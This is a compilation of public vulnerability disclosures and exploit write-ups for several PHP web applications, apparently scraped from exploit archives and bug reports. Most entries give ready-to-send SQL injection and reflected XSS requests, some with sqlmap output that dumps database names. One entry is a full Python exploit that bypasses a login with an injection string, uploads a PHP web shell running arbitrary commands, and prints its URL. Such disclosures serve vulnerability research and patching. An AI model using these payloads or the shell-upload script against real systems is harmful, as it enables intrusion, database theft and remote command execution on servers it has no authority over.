Online Pizza Ordering System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Pizza Ordering System 1.0 - "id" SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the (/php-opos/index.php) page in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands by "id" parameter. ## Request PoC```GET /php-opos/index.php?page=category&id=1' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "id" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```GET /php-opos/index.php?page=category&id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/php-opos]└─# sqlmap -r sql.txt -p 'id' --batch --dbs --level=3 --risk=2---snip---[13:20:45] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=category&id=1' AND 9957=9957-- dMoW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: page=category&id=1' AND (SELECT 9683 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(9683=9683,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JUhz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=category&id=1' AND (SELECT 1462 FROM (SELECT(SLEEP(5)))HRjs)-- mEaq    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: page=category&id=-1987' UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x79716851566b7072685458534e4c6f7a75784f50614266454c7746646347794d565a43634b684958,0x716a6b7071)-- ----[13:20:45] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.2.0back-end DBMS: MySQL >= 5.0 (MariaDB fork)[13:20:45] [INFO] fetching database names[13:20:45] [INFO] retrieved: 'information_schema'[13:20:46] [INFO] retrieved: 'mysql'[13:20:46] [INFO] retrieved: 'opos_db'[13:20:46] [INFO] retrieved: 'performance_schema'[13:20:46] [INFO] retrieved: 'phpmyadmin'----snip----```

Online Pizza Ordering System 1.0 SQL Injection

Human Resources Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Human Resources Management System - HRM - Multiple SQLi# Date: 16/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip# Version: 1.0# Tested on: Windows## Description A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter. ## Request PoC```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 73name=test@testdomain.com'&password=test&submit=Sign+In```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 114name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/hrm]└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2---snip----[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:---Parameter: name (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In---[15:49:36] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54, PHP----snip----```## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.

Human Resources Management System 1.0 SQL Injection

A vulnerability classified as critical was found in SourceCodester Automatic Question Paper Generator System 1.0. This vulnerability affects unknown code of the file users/question_papers/manage_question_paper.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223336.

BUG\_Author:0019FF

Vulnerability File: /aqpg/users/question\_papers/manage\_question\_paper.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and 999=999 and 'o'='o

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20999=999%20and%20%27o%27=%27o HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The sql statement is executed correctly

Payload2:id=1' and 999=996 and 'o'='p

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20999=996%20and%20%27o%27=%27p HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The sql statement was executed incorrectly, causing the page not to be echoed normally

Payload3:id=1' and (select 9 from (select(sleep(15)))b) and 't'='t

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20(select%209%20from%20(select(sleep(15)))b)%20and%20%27t%27=%27t HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The server response time is 15 seconds

CVE-2023-1474: bug_report/SQLi.md at main · 19FF/bug_report

A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracker System 1.0. This issue affects some unknown processing of the file medicines/view_details.php of the component GET Parameter Handler. The manipulation of the argument GET leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223283.

BUG\_Author:godgua

Vulnerability File: /php-mts/app/medicines/view\_details.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=-1' union all select null,null,null,concat(0x51525354,0x41424344,0x61626364),null,null-- -

    GET /php-mts/app/medicines/view_details.php?id=-1%27%20union%20all%20select%20null,null,null,concat(0x51525354,0x41424344,0x61626364),null,null--%20- HTTP/1.1
    Host: 192.168.0.100
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=t194o00fbqgbautftistta6ap2
    Connection: close
    

union query success

Payload2:id=1' and (select 2 from (select(sleep(15)))a) AND 'c'='c

    GET /php-mts/app/medicines/view_details.php?id=1%27%20and%20(select%202%20from%20(select(sleep(15)))a)%20AND%20%27c%27=%27c HTTP/1.1
    Host: 192.168.0.100
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=t194o00fbqgbautftistta6ap2
    Connection: close
    

The server's response time is 15 seconds

CVE-2023-1439: bug_report/SQLi-1.md at main · GodGua/bug_report

School Registration and Fee System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at/bilal final/edit_user.php.

Permalink

Cannot retrieve contributors at this time

**School Registration and Fee System v1.0 has SQL injection**

BUG\_Author:Forsan

Vulnerability File: /bilal final/edit\_user.php

GET parameter 'id' exists SQL injection vulnerability

Payload1: http://localhost/bilal%20final/edit\_user.php?id=3%27

    GET /bilal%20final/edit_user.php?id=3%27 HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

An error occurred in the sql statement

Payload2: http://localhost/bilal%20final/edit\_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b

    GET /bilal%20final/edit_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

The server's response time is 5 seconds

CVE-2023-27041: bug_report/SQLi-1.md at main · forsean/bug_report

Simple Image Gallery v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the username parameter.

    # Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
    # Date: 17.08.2021
    # Exploit Author: Tagoletta (Tağmaç)
    # Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
    # Version: V 1.0
    # Tested on: Ubuntu
    
    import requests
    import random
    import string
    import json
    from bs4 import BeautifulSoup
    
    url = input("TARGET = ")
    
    if not url.startswith('http://') and not url.startswith('https://'):
        url = "http://" + url
    if not url.endswith('/'):
        url = url + "/"
    
    payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
    
    session = requests.session()
    
    print("Login Bypass")
    
    request_url = url + "/classes/Login.php?f=login"
    post_data = {"username": "admin' or '1'='1'#", "password": ""}
    bypassUser = session.post(request_url, data=post_data)
    data = json.loads(bypassUser.text)
    status = data["status"]
    
    if status == "success":
    
        let = string.ascii_lowercase
    
        shellname = ''.join(random.choice(let) for i in range(15))
        shellname = 'Tago'+shellname+'Letta'
    
        print("shell name "+shellname)
    
        print("\nprotecting user")
        request_url = url + "?page=user"
        getHTML = session.get(request_url)
        getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
    
        ids = getHTMLParser.find('input', {'name':'id'}).get("value")
        firstname = getHTMLParser.find('input', {'id':'firstname'}).get("value")
        lastname = getHTMLParser.find('input', {'id':'lastname'}).get("value")
        username = getHTMLParser.find('input', {'id':'username'}).get("value")
    
        print("\nUser ID : " + ids)
        print("Firsname : " + firstname)
        print("Lasname : " + lastname)
        print("Username : " + username + "\n")
    
        print("shell uploading")
    
        request_url = url + "/classes/Users.php?f=save"
        request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"}
        request_data = "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n"
        upload = session.post(request_url, headers=request_headers, data=request_data)
    
        if upload.text == "1":
            print("- OK -")
            req = session.get(url + "/?page=user")
            parser = BeautifulSoup(req.text, 'html.parser')
            find_shell = parser.find('img', {'id':'cimg'})
            print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
        else:
            print("- NO :( -")
    else:
        print("No bypass user")

CVE-2023-27040: Offensive Security’s Exploit Database Archive

Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via the Comment Manager /admin/manage-comments.php component.

**Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability****Influenced Version**

Typecho <= 1.2.0

**Description**

Typecho admin backend comment manager with refleted-XSS vulnerability..

1.  Login to admin backend management system.
2.  In Comment Manager /admin/manage-comments.php, the unfiltered request parameter cid is directly echoed to html.

**POC**

POST /admin/manage-comments.php with:

    coid[]=1&cid="><script>alert(1)</script><!--
    

The full POC request:

POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&\_\_typecho\_all\_posts=off&uid= HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 745020ecd4b17dde48d43755702a78b4\_\_typecho\_uid=1; 745020ecd4b17dde48d43755702a78b4\_\_typecho\_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD\_2132\_saltkey=ql9191Ym; u5DD\_2132\_lastvisit=1677486351; u5DD\_2132\_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD\_2132\_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD\_2132\_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD\_2132\_lastcheckfeed=1%7C1677489964; u5DD\_2132\_nofavfid=1; u5DD\_2132\_home\_diymode=1; u5DD\_2132\_visitedfid=2; u5DD\_2132\_smile=1D1; u5DD\_2132\_home\_readfeed=1677497943; u5DD\_2132\_forum\_lastvisit=D\_2\_1677498054; u5DD\_2132\_st\_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD\_2132\_editormode\_e=1; u5DD\_2132\_st\_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD\_2132\_viewid=tid\_1; u5DD\_2132\_seccode=5.792e3c6d8b004d4403; u5DD\_2132\_seccodecSE52ETX=6.a73b7daa353701b59a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

coid\[\]=1&cid="><script>alert(1)</script><!--

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27711: Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability · Issue #1539 · typecho/typecho

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dedestory_catalog.php endpoint.

**Description**

Admin backend story catalog blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/story_catalog.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  Requires PHP ≤ 5 and MySQL ≤ 5.5, and the story component contains at least one record in database.
4.  In the source code of /dede/story_catalog.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

POST /cms/dedecms/dede/story\_catalog.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fstory\_books.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27709: DedeCMS V5.7.160 Backend Blind SQL Injection

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dede/group_store.php endpoint.

**Description**

Admin backend group store blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/group_store.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  In the source code of /dede/group_store.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  

POST /cms/dedecms/dede/group\_store.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup\_store.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27707: DedeCMS V5.7.160 Backend Blind SQL Injection

Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via an arbitrarily supplied URL parameter.

**Typecho <= 1.2.0 Admin System with Reflected-XSS****Influenced Version**

Typecho <= 1.2.0

**Description**

Typecho admin backend management system with reflected-XSS in the name of an arbitrarily supplied URL parameter.

1.  Login to typecho admin backend management system, in "/admin/index.php", "admin/themes.php" or "/admin/backup.php".
2.  In the name of an arbitrarily supplied URL parameter, no matter key or value, will be injected to a html href attribute of <a> tag.

**POC**

    GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1
    Host: 192.168.0.10
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296
    Connection: close
    
    

/admin/index.php

/admin/theme.php

/admin/backup.php

> Reported by Srpopty, vulnerability discovered by using Corax.

Tag

#webkit